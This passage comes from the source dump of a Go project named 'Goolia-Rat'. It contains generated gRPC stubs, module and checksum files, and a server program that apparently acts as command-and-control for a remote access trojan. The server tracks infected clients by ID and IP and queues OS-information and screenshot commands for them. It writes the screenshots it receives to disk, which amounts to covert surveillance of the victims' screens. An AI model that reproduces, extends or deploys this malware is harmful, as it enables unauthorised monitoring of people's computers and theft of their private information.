return status.Errorf(codes.Unimplemented, "method HandleCommands not implemented") 340 | } 341 | 342 | func RegisterComServer(s *grpc.Server, srv ComServer) { 343 | s.RegisterService(&_Com_serviceDesc, srv) 344 | } 345 | 346 | func _Com_HandleCommands_Handler(srv interface{}, stream grpc.ServerStream) error { 347 | return srv.(ComServer).HandleCommands(&comHandleCommandsServer{stream}) 348 | } 349 | 350 | type Com_HandleCommandsServer interface { 351 | Send(*Response) error 352 | Recv() (*Request, error) 353 | grpc.ServerStream 354 | } 355 | 356 | type comHandleCommandsServer struct { 357 | grpc.ServerStream 358 | } 359 | 360 | func (x *comHandleCommandsServer) Send(m *Response) error { 361 | return x.ServerStream.SendMsg(m) 362 | } 363 | 364 | func (x *comHandleCommandsServer) Recv() (*Request, error) { 365 | m := new(Request) 366 | if err := x.ServerStream.RecvMsg(m); err != nil { 367 | return nil, err 368 | } 369 | return m, nil 370 | } 371 | 372 | var _Com_serviceDesc = grpc.ServiceDesc{ 373 | ServiceName: "protobuf.Com", 374 | HandlerType: (*ComServer)(nil), 375 | Methods: []grpc.MethodDesc{}, 376 | Streams: []grpc.StreamDesc{ 377 | { 378 | StreamName: "HandleCommands", 379 | Handler: _Com_HandleCommands_Handler, 380 | ServerStreams: true, 381 | ClientStreams: true, 382 | }, 383 | }, 384 | Metadata: "com.proto", 385 | } 386 | -------------------------------------------------------------------------------- /proto/go.mod: -------------------------------------------------------------------------------- 1 | module github.com/NukeDev/Goolia-Rat/proto 2 | 3 | go 1.20 4 | -------------------------------------------------------------------------------- /protobuf.bash: -------------------------------------------------------------------------------- 1 | protoc --go_out=plugins=grpc:. *.proto 2 | cd ./proto && go mod init github.com/NukeDev/Goolia-Rat/proto -------------------------------------------------------------------------------- /server/go.mod: -------------------------------------------------------------------------------- 1 | module github.com/NukeDev/Goolia-Rat/server 2 | 3 | go 1.14 4 | 5 | require ( 6 | github.com/NukeDev/Goolia-Rat/proto v0.0.0-20230623094734-f2acd1c7217a 7 | google.golang.org/grpc v1.28.1 8 | google.golang.org/protobuf v1.30.0 // indirect 9 | ) 10 | -------------------------------------------------------------------------------- /server/go.sum: -------------------------------------------------------------------------------- 1 | cloud.google.com/go v0.26.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw= 2 | github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU= 3 | github.com/NukeDev/Goolia-Rat/proto v0.0.0-20230623094734-f2acd1c7217a h1:uR402j15DSFYwl2cFtJUIRs5QLpbAIn5zAwLRQlakrc= 4 | github.com/NukeDev/Goolia-Rat/proto v0.0.0-20230623094734-f2acd1c7217a/go.mod h1:vy6C0Wd4bwbJp5fdFKxMBQSj5sWdZ+6BmahcBl0ISSc= 5 | github.com/census-instrumentation/opencensus-proto v0.2.1/go.mod h1:f6KPmirojxKA12rnyqOA5BBL4O983OfeGPqjHWSTneU= 6 | github.com/client9/misspell v0.3.4/go.mod h1:qj6jICC3Q7zFZvVWo7KLAzC3yx5G7kyvSDkc90ppPyw= 7 | github.com/cncf/udpa/go v0.0.0-20191209042840-269d4d468f6f/go.mod h1:M8M6+tZqaGXZJjfX53e64911xZQV5JYwmTeXPW+k8Sc= 8 | github.com/envoyproxy/go-control-plane v0.9.0/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4= 9 | github.com/envoyproxy/go-control-plane v0.9.4/go.mod h1:6rpuAdCZL397s3pYoYcLgu1mIlRU8Am5FuJP05cCM98= 10 | github.com/envoyproxy/protoc-gen-validate v0.1.0/go.mod h1:iSmxcyjqTsJpI2R4NaDN7+kN2VEUnK/pcBlmesArF7c= 11 | github.com/golang/glog v0.0.0-20160126235308-23def4e6c14b/go.mod h1:SBH7ygxi8pfUlaOkMMuAQtPIUF8ecWP5IEl/CR7VP2Q= 12 | github.com/golang/mock v1.1.1/go.mod h1:oTYuIxOrZwtPieC+H1uAHpcLFnEyAGVDL/k47Jfbm0A= 13 | github.com/golang/protobuf v1.2.0/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= 14 | github.com/golang/protobuf v1.3.2/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= 15 | github.com/golang/protobuf v1.3.3/go.mod h1:vzj43D7+SQXF/4pzW/hwtAqwc6iTitCiVSaWz5lYuqw= 16 | github.com/golang/protobuf v1.5.0 h1:LUVKkCeviFUMKqHa4tXIIij/lbhnMbP7Fn5wKdKkRh4= 17 | github.com/golang/protobuf v1.5.0/go.mod h1:FsONVRAS9T7sI+LIUmWTfcYkHO4aIWwzhcaSAoJOfIk= 18 | github.com/google/go-cmp v0.2.0/go.mod h1:oXzfMopK8JAjlY9xF4vHSVASa0yLyX7SntLO5aqRK0M= 19 | github.com/google/go-cmp v0.5.5 h1:Khx7svrCpmxxtHBq5j2mp/xVjsi8hQMfNLvJFAlrGgU= 20 | github.com/google/go-cmp v0.5.5/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= 21 | github.com/prometheus/client_model v0.0.0-20190812154241-14fe0d1b01d4/go.mod h1:xMI15A0UPsDsEKsMN9yxemIoYk6Tm2C1GtYGdfGttqA= 22 | golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= 23 | golang.org/x/exp v0.0.0-20190121172915-509febef88a4/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA= 24 | golang.org/x/lint v0.0.0-20181026193005-c67002cb31c3/go.mod h1:UVdnD1Gm6xHRNCYTkRU2/jEulfH38KcIWyp/GAMgvoE= 25 | golang.org/x/lint v0.0.0-20190227174305-5b3e6a55c961/go.mod h1:wehouNa3lNwaWXcvxsM5YxQ5yQlVC4a0KAMCusXpPoU= 26 | golang.org/x/lint v0.0.0-20190313153728-d0100b6bd8b3/go.mod h1:6SW0HCj/g11FgYtHlgUYUwCkIfeOF89ocIRzGO/8vkc= 27 | golang.org/x/net v0.0.0-20180724234803-3673e40ba225/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= 28 | golang.org/x/net v0.0.0-20180826012351-8a410e7b638d/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= 29 | golang.org/x/net v0.0.0-20190213061140-3a22650c66bd/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= 30 | golang.org/x/net v0.0.0-20190311183353-d8887717615a h1:oWX7TPOiFAMXLq8o0ikBYfCJVlRHBcsciT5bXOrH628= 31 | golang.org/x/net v0.0.0-20190311183353-d8887717615a/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= 32 | golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U= 33 | golang.org/x/sync v0.0.0-20180314180146-1d60e4601c6f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= 34 | golang.org/x/sync v0.0.0-20181108010431-42b317875d0f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= 35 | golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= 36 | golang.org/x/sys v0.0.0-20180830151530-49385e6e1522/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= 37 | golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a h1:1BGLXjeY4akVXGgbC9HugT3Jv3hCI0z56oJR5vAMgBU= 38 | golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= 39 | golang.org/x/text v0.3.0 h1:g61tztE5qeGQ89tm6NTjjM9VPIm088od1l6aSorWRWg= 40 | golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= 41 | golang.org/x/tools v0.0.0-20190114222345-bf090417da8b/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= 42 | golang.org/x/tools v0.0.0-20190226205152-f727befe758c/go.mod h1:9Yl7xja0Znq3iFh3HoIrodX9oNMXvdceNzlUR8zjMvY= 43 | golang.org/x/tools v0.0.0-20190311212946-11955173bddd/go.mod h1:LCzVGOaR6xXOjkQ3onu1FJEFr0SW1gC7cKk1uF8kGRs= 44 | golang.org/x/tools v0.0.0-20190524140312-2c0ae7006135/go.mod h1:RgjU9mgBXZiqYHBnxXauZ1Gv1EHHAz9KjViQ78xBX0Q= 45 | golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543 h1:E7g+9GITq07hpfrRu66IVDexMakfv52eLZ2CXBWiKr4= 46 | golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= 47 | google.golang.org/appengine v1.1.0/go.mod h1:EbEs0AVv82hx2wNQdGPgUI5lhzA/G0D9YwlJXL52JkM= 48 | google.golang.org/appengine v1.4.0/go.mod h1:xpcJRLb0r/rnEns0DIKYYv+WjYCduHsrkT7/EB5XEv4= 49 | google.golang.org/genproto v0.0.0-20180817151627-c66870c02cf8/go.mod h1:JiN7NxoALGmiZfu7CAH4rXhgtRTLTxftemlI0sWmxmc= 50 | google.golang.org/genproto v0.0.0-20190819201941-24fa4b261c55 h1:gSJIx1SDwno+2ElGhA4+qG2zF97qiUzTM+rQ0klBOcE= 51 | google.golang.org/genproto v0.0.0-20190819201941-24fa4b261c55/go.mod h1:DMBHOl98Agz4BDEuKkezgsaosCRResVns1a3J2ZsMNc= 52 | google.golang.org/grpc v1.19.0/go.mod h1:mqu4LbDTu4XGKhr4mRzUsmM4RtVoemTSY81AxZiDr8c= 53 | google.golang.org/grpc v1.23.0/go.mod h1:Y5yQAOtifL1yxbo5wqy6BxZv8vAUGQwXBOALyacEbxg= 54 | google.golang.org/grpc v1.25.1/go.mod h1:c3i+UQWmh7LiEpx4sFZnkU36qjEYZ0imhYfXVyQciAY= 55 | google.golang.org/grpc v1.28.1 h1:C1QC6KzgSiLyBabDi87BbjaGreoRgGUF5nOyvfrAZ1k= 56 | google.golang.org/grpc v1.28.1/go.mod h1:rpkK4SK4GF4Ach/+MFLZUBavHOvF2JJB5uozKKal+60= 57 | google.golang.org/protobuf v1.26.0-rc.1/go.mod h1:jlhhOSvTdKEhbULTjvd4ARK9grFBp09yW+WbY/TyQbw= 58 | google.golang.org/protobuf v1.30.0 h1:kPPoIgf3TsEvrm0PFe15JQ+570QVxYzEvvHqChK+cng= 59 | google.golang.org/protobuf v1.30.0/go.mod h1:HV8QOd/L58Z+nl8r43ehVNZIU/HEI6OcFqwMG9pJV4I= 60 | honnef.co/go/tools v0.0.0-20190102054323-c2f93a96b099/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4= 61 | honnef.co/go/tools v0.0.0-20190523083050-ea95bdfd59fc/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4= 62 | -------------------------------------------------------------------------------- /server/server.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "bufio" 5 | "encoding/json" 6 | "flag" 7 | "fmt" 8 | "io" 9 | "io/ioutil" 10 | "log" 11 | "net" 12 | "os" 13 | "strconv" 14 | "strings" 15 | "time" 16 | 17 | pb "github.com/NukeDev/Goolia-Rat/proto" 18 | 19 | "google.golang.org/grpc" 20 | ) 21 | 22 | type server struct{} 23 | type CommandLine struct{} 24 | type OSInfo struct { 25 | Family string 26 | Architecture string 27 | ID string 28 | Name string 29 | Codename string 30 | Version string 31 | Build string 32 | } 33 | type Shots struct { 34 | ShotTime time.Time 35 | Data []byte 36 | } 37 | type Client struct { 38 | ID string 39 | ClientIP string 40 | LastPing time.Time 41 | } 42 | 43 | var Clients = map[string]Client{} 44 | var Command = map[string]string{} 45 | 46 | func (s server) HandleCommands(srv pb.Com_HandleCommandsServer) error { 47 | 48 | ctx := srv.Context() 49 | for { 50 | 51 | // exit if context is done 52 | // or continue 53 | select { 54 | case <-ctx.Done(): 55 | return nil 56 | default: 57 | } 58 | 59 | // receive data from stream 60 | req, err := srv.Recv() 61 | 62 | if err == io.EOF { 63 | // return will close stream from server side 64 | log.Println("EOF") 65 | return nil 66 | } 67 | if err != nil { 68 | log.Printf("receive error %v", err) 69 | continue 70 | } 71 | 72 | // continue if number reveived from stream 73 | // less than max 74 | 75 | cl := Client{ 76 | ID: req.ClientID, 77 | ClientIP: req.ClientIPAddress, 78 | LastPing: time.Now(), 79 | } 80 | 81 | switch req.Command { 82 | case "ping": 83 | { 84 | 85 | Clients[cl.ID] = cl 86 | 87 | customCmd := Command[cl.ID] 88 | 89 | if customCmd != "" { 90 | resp := pb.Response{ClientID: cl.ID, ClientIPAddress: cl.ClientIP, Command: customCmd, Data: nil} 91 | delete(Command, cl.ID) 92 | if err := srv.Send(&resp); err != nil { 93 | log.Printf("OSINFO: error %v", err) 94 | } 95 | } else { 96 | resp := pb.Response{ClientID: cl.ID, ClientIPAddress: cl.ClientIP, Command: "ping", Data: nil} 97 | 98 | if err := srv.Send(&resp); err != nil { 99 | log.Printf("PING: error %v", err) 100 | } 101 | } 102 | 103 | } 104 | case "osinfo": 105 | { 106 | var osinfo OSInfo 107 | 108 | err := json.Unmarshal(req.Data, &osinfo) 109 | 110 | if err != nil { 111 | log.Fatalf("%v", err) 112 | } 113 | 114 | log.Println("-------------------") 115 | log.Printf("OSINFO - Client ID %s\n", req.ClientID) 116 | log.Println("-------------------") 117 | log.Println("Family: " + osinfo.Family) 118 | log.Println("Architecture: " + osinfo.Architecture) 119 | log.Println("ID: " + osinfo.ID) 120 | log.Println("Name: " + osinfo.Name) 121 | log.Println("Codename: " + osinfo.Codename) 122 | log.Println("Version: " + osinfo.Version) 123 | log.Println("Build: " + osinfo.Build) 124 | log.Println("-------------------") 125 | 126 | } 127 | case "screenshot": 128 | { 129 | var shots []Shots 130 | 131 | err := json.Unmarshal(req.Data, &shots) 132 | 133 | if err != nil { 134 | log.Fatalf("%v", err) 135 | } 136 | 137 | for shot := range shots { 138 | i := strconv.Itoa(shot) 139 | 140 | ioutil.WriteFile(time.Now().Format("20060102150405")+i+".png", shots[shot].Data, 0777) 141 | fmt.Printf("Receiving screenshot from Clientid [%s]\n", cl.ID) 142 | } 143 | 144 | } 145 | default: 146 | { 147 | resp := pb.Response{ClientID: req.ClientID, ClientIPAddress: req.ClientIPAddress, Command: "not-found", Data: nil} 148 | if err := srv.Send(&resp); err != nil { 149 | log.Printf("Command Not-Found error %v", err) 150 | } 151 | log.Printf("Sent command not found to client id=%s", req.ClientID) 152 | } 153 | } 154 | 155 | } 156 | } 157 | 158 | func main() { 159 | // create listiner 160 | go func() { 161 | lis, err := net.Listen("tcp", ":50005") 162 | if err != nil { 163 | log.Fatalf("failed to listen: %v", err) 164 | } 165 | // create grpc server 166 | s := grpc.NewServer() 167 | pb.RegisterComServer(s, server{}) 168 | 169 | // and start... 170 | if err := s.Serve(lis); err != nil { 171 | log.Fatalf("failed to serve: %v", err) 172 | } 173 | }() 174 | 175 | cmd := CommandLine{} 176 | cmd.Run() 177 | 178 | } 179 | 180 | func (cli *CommandLine) printUsage() { 181 | fmt.Println("Usage: ") 182 | fmt.Println("clients - [Gets connected clients]") 183 | fmt.Println("osinfo -clientid - [Gets OSINFO of specified client]") 184 | fmt.Println("screenshot -clientid - [Gets SCREENSHOTS of specified client]") 185 | } 186 | 187 | func (cli *CommandLine) validateArgs(data []string) { 188 | if len(data) < 1 { 189 | cli.printUsage() 190 | } 191 | } 192 | 193 | func (cli *CommandLine) getClients() { 194 | 195 | localIds := GenerateClientsIds(Clients) 196 | 197 | for id := range localIds { 198 | now := time.Now() 199 | lastContact := now.Sub(Clients[localIds[id]].LastPing) 200 | log.Printf("[%v] Client ID: %s - IP: %s - Last Contact: %s ago", id, localIds[id], Clients[localIds[id]].ClientIP, lastContact) 201 | 202 | } 203 | } 204 | 205 | func (cli *CommandLine) Run() { 206 | 207 | for { 208 | 209 | input := bufio.NewScanner(os.Stdin) 210 | input.Scan() 211 | data := strings.Fields(input.Text()) 212 | cli.validateArgs(data) 213 | 214 | clients := flag.NewFlagSet("clients", flag.ExitOnError) 215 | osinfo := flag.NewFlagSet("osinfo", flag.ExitOnError) 216 | screenshot := flag.NewFlagSet("screenshot", flag.ExitOnError) 217 | clientosinfo := osinfo.String("clientid", "", "Gets OSINFO of specified client") 218 | clientscreenshot := screenshot.String("clientid", "", "Gets Screenshots of specified client") 219 | switch data[0] { 220 | case "clients": 221 | err := clients.Parse(data[1:]) 222 | if err != nil { 223 | log.Panic(err) 224 | } 225 | case "osinfo": 226 | err := osinfo.Parse(data[1:]) 227 | if err != nil { 228 | log.Panic(err) 229 | } 230 | case "screenshot": 231 | err := screenshot.Parse(data[1:]) 232 | if err != nil { 233 | log.Panic(err) 234 | } 235 | default: 236 | cli.printUsage() 237 | } 238 | 239 | if clients.Parsed() { 240 | 241 | cli.getClients() 242 | } 243 | 244 | if osinfo.Parsed() { 245 | if *clientosinfo == "" { 246 | osinfo.Usage() 247 | } else { 248 | 249 | if id, err := strconv.Atoi(*clientosinfo); err == nil { 250 | localIds := GenerateClientsIds(Clients) 251 | if Clients[localIds[id]].ID != "" { 252 | if Command[Clients[localIds[id]].ID] == "osinfo" { 253 | log.Println("WARING: osinfo request already sent to client... Please wait a response!") 254 | } else { 255 | log.Println("INFO: osinfo request sent to client... Please wait a response!") 256 | Command[Clients[localIds[id]].ID] = "osinfo" 257 | } 258 | } else { 259 | log.Println("ERROR: Invalid Client ID!") 260 | } 261 | 262 | } else { 263 | 264 | if Clients[*clientosinfo].ID != "" { 265 | if Command[*clientosinfo] == "osinfo" { 266 | log.Println("WARING: osinfo request already sent to client... Please wait a response!") 267 | } else { 268 | log.Println("INFO: osinfo request sent to client... Please wait a response!") 269 | Command[*clientosinfo] = "osinfo" 270 | } 271 | } else { 272 | log.Println("ERROR: Invalid Client ID!") 273 | } 274 | 275 | } 276 | 277 | } 278 | 279 | } 280 | 281 | if screenshot.Parsed() { 282 | if *clientscreenshot == "" { 283 | screenshot.Usage() 284 | } else { 285 | 286 | if id, err := strconv.Atoi(*clientscreenshot); err == nil { 287 | localIds := GenerateClientsIds(Clients) 288 | if Clients[localIds[id]].ID != "" { 289 | if Command[Clients[localIds[id]].ID] == "screenshot" { 290 | log.Println("WARING: screenshot request already sent to client... Please wait a response!") 291 | } else { 292 | log.Println("INFO: screenshot request sent to client... Please wait a response!") 293 | Command[Clients[localIds[id]].ID] = "screenshot" 294 | } 295 | } else { 296 | log.Println("ERROR: Invalid Client ID!") 297 | } 298 | 299 | } else { 300 | 301 | if Clients[*clientscreenshot].ID != "" { 302 | if Command[*clientscreenshot] == "screenshot" { 303 | log.Println("WARING: screenshot request already sent to client... Please wait a response!") 304 | } else { 305 | log.Println("INFO: screenshot request sent to client... Please wait a response!") 306 | Command[*clientscreenshot] = "screenshot" 307 | } 308 | } else { 309 | log.Println("ERROR: Invalid Client ID!") 310 | } 311 | 312 | } 313 | } 314 | } 315 | } 316 | 317 | } 318 | 319 | // GenerateClientsIds returns clients mapped as int 320 | func GenerateClientsIds(clients map[string]Client) map[int]string { 321 | localID := 0 322 | localIDMap := map[int]string{} 323 | for k := range clients { 324 | localID++ 325 | localIDMap[localID] = k 326 | } 327 | return localIDMap 328 | } 329 | --------------------------------------------------------------------------------